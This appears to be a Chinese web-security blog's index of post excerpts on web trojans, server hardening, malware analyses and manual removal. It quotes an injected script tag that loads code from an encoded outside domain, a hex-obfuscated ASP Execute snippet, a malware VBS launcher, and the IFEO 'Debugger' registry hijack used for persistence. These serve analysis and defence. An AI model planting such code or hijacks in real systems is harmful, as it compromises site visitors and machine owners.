前不久一行代码解决iframe挂马（包含服务器端注入、客户端ARP注入等）》得到了很多朋友的认可，这确实是个避避风雨的好办法。可现在挂网马的方式真如我所料地改变了，现在流行挂<script>木马，汗了，看了几个网友的网站都被这样了——页面的顶部或底部加上了：注意，以下地址含有木马，请不要轻易访问：<script src=http://%76%63%63%64%2E%63%6E></script><script src=http://%76%63%63%64%2E%63%6E></script><s...

1、防止跳出web目录　　首先修改httpd.conf，假如您只允许您的php脚本程式在web目录里操作，还能够修改httpd.conf文档限制php的操作路径。比如您的web目录是/usr/local/apache/htdocs，那么在httpd.conf里加上这么几行：　　php_admin_value open_basedir /usr/local/apache/htdocs　　这样，假如脚本要读取/usr/local/apache/htdocs以外的文档将不会被允许，假如错误显示打开的话会提示这样的错误： 　　Warning: open_base...

今天试了下AspJpeg组件，发现用AspJpeg组件去处理不正常的图片文件的时候就会出错，呵呵，这个正好可以让我们用来检查图片的合法性，偶给封装成函数了～[code]'-------------------------------------------'函数名：chkimg'作　用：检查图片文件是否合法'参　数：img，图片路径'返回值：布尔类型'条　件：服务器必须支持AspJpeg'-------------------------------------------Function chkimg(img)      ...

文件名称：gg.exe文件大小：65607 byteAV命名：Worm.Win32.AutoRun.wp  卡巴斯基Worm.Delf.65607  金山毒霸Win32.HLLW.Autoruner.548   Dr.WEB加壳方式：未编写语言：Microsoft Visual C++ 6.0文件MD5：33d493af096ef2fa6e1885a08ab201e6行为分析：1、  释放病毒文件：C:\WINDOWS\gg.exe  65607...

不知道怎样表达清楚。看例子吧：[code]<script language=vbs runat=server>  Execute(HextoStr("65786563757465287265717565737428636872283335292929")) Function HextoStr(data) HextoStr="EXECUTE """"" C="&CHR(&H" N=")" Do While Len(data)>1&nb...

我们知道，有些木马是通过修改exe的文件关联来实现随EXE程序启动的。今天我在网上看到有另外一个显为人知的方法，就是通过在注册表HKEY_LOCAL_MACHINE\SOFTWARE \Microsoft\Windows NT\ CurrentVersion\Image File Execution Options 下新建一个注册表项，项名为A.exe，然后在下面新建一个字符串，字符串名为Debugger，字符串值就是程序B.exe的全路径。 　　很明显，这个是针对系统可以设置每个程序指定的纠错程序来实现的。让我感...

roirpy.exe,mrnds3oy.dll,qh55i.dll等木马群手工清除解决方案 用xdelbox删除下面文件（添加下面所有路径或在空白处点右键-从剪贴板导入,在已添加的文件路径上点击右键，选择立刻重启执行删除[有提示不存在该文件的就忽略,添加其它文件]）:  c:\windows\roirpy.exe  c:\windows\uunjkd.exe  c:\windows\49400l.exe  c:\windows\49400m.exe  c:\windows\fjrlwx...

木马Trojan-PSW.Win32.Magania.cjyinst.exe,Setup.exeBackdoor/Agent.apnf 病毒名称： Trojan-PSW.Win32.Magania.cjy病毒类型： 木马江民杀毒 10.00.650  Backdoor/Agent.apnf 1.395NOD32 2.70.10  a variant of Win32/PSW.OnLineGames.NFF trojan 4.185该病毒为玛格尼亚...

木马程序Trojan-Spy.Win32.Agent.cfu该样本程序是一个使用Delphi编写的程序，程序采用MEW 1.x加壳企图躲避特征码扫描，长度为67,908字节，图标为windows默认图标，病毒扩展名为exe，主要传播途径网页挂马、文件捆绑、黑客攻击。病毒分析　　该样本程序被激活后释放systen.dll文件到%systemroot%\system32目录下，释放451062.dll文件（该文件名为6位或7位随机数字）到%systemroot%目录下，运行批处理删除自身；添加注册表相关键值将systen.dll注入到Winlogon进程中，获取鼠标键盘事件；连接远程网络...

一、学伯乐 认马识马木马这东西从本质上说，就是一种远程控制软件。不过远程控制软件也分正规部队和山间土匪。正规部队顾名思义就是名正言顺的帮你远程管理和设置电脑的软件，如Windows XP自带的远程协助功能，一般这类软件在运行时，都会在系统任务栏中出现，明确的告诉用户当前系统处于被控制状态；而木马则属于山间土匪，他们会偷偷潜入你的电脑进行破坏，并通过修改注册表、捆绑在正常程序上的方式运行，使你难觅其踪迹。木马与普通远程控制软件另外一个不同点在于，木马实现的远程控制功能更为丰富，其不仅能够实现一般远程控制软件的功能，还可以破坏系统文件、记录键盘动作、盗取密码、修改注册表和限制系...

最新病毒结合auto.exe,游戏盗号木马下载者手工查杀下面是启用病毒的代码microsofts.vbs[code]Set Lovecuteqq = CreateObject("Wscript.Shell")Lovecuteqq.run ("C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\microsofts.pif")[/code]木马名称：Trojan-PSW/Win32.OnLineGames.lxt路径：C:\WINDOWS\system32\k11987380222.exe查杀时间 ：2007-12-27&nbs...